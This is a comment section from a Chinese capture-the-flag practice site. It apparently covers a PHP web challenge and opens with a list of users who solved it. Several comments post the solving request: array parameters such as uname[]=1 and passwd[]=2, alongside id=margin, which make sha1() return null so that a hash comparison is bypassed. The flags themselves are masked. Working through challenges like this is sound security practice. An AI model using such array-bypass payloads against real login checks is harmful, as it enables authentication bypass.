评分(4)
解题动态
yz-safer 攻破了该题 9小时前
kalijee 攻破了该题 9小时前
lvchijing 攻破了该题 13小时前
13Exp 攻破了该题 13小时前
yyl 攻破了该题 18小时前
hell0-hnc 攻破了该题 21小时前
妖精 攻破了该题 23小时前
13830759935 攻破了该题 1天前
satisfaction 攻破了该题 1天前
两只小金鱼 攻破了该题 1天前
星落. 攻破了该题 1天前
hork 攻破了该题 3天前
aaaaaa1111 攻破了该题 4天前
paper2005 攻破了该题 4天前
GrantFly 攻破了该题 4天前
zeith 攻破了该题 5天前
薄言. 攻破了该题 5天前
huopt 攻破了该题 5天前
zykshangan 攻破了该题 5天前
评论
ubudj 10月前
举报
?uname[]=1&id=margin POST: passwd[]=2
zhenhui 10月前
举报
GET: ?uname[]=1&id=margin POST: passwd[]=2
wywsssf 10月前
举报
链接后面加?uname[]=1&id=margin,同时POST中passwd[]=2
ctfer-pls 11月前
举报
GET:id=margin&uname[]=111a POST:passwd[]=2bba
2686213396 11月前
举报
flag{*********}
2686213396 11月前
举报
我喜欢hackbar这个插件(POST方法的最优选择),相当于帮你写好请求头格式的bp,只需要填写上传的参数即可,本题思路,直接url传参uname和id,通过数组实现绕过,再由hackbarPOSTpasswd的参数,获得flag,这道题目的核心依旧是代码审计
iNMB 11月前
举报
很奇怪bp不行,用其他方法可以不知道为什么
SLfanCTF 11月前
举报
数组sha1为空,传入数组绕过
zhuizhui 12月前
举报
POST /?id=margin&uname[]=1 passwd[]=11 数组绕过sha-1
ahsjezyt 1年前
举报
flag{********}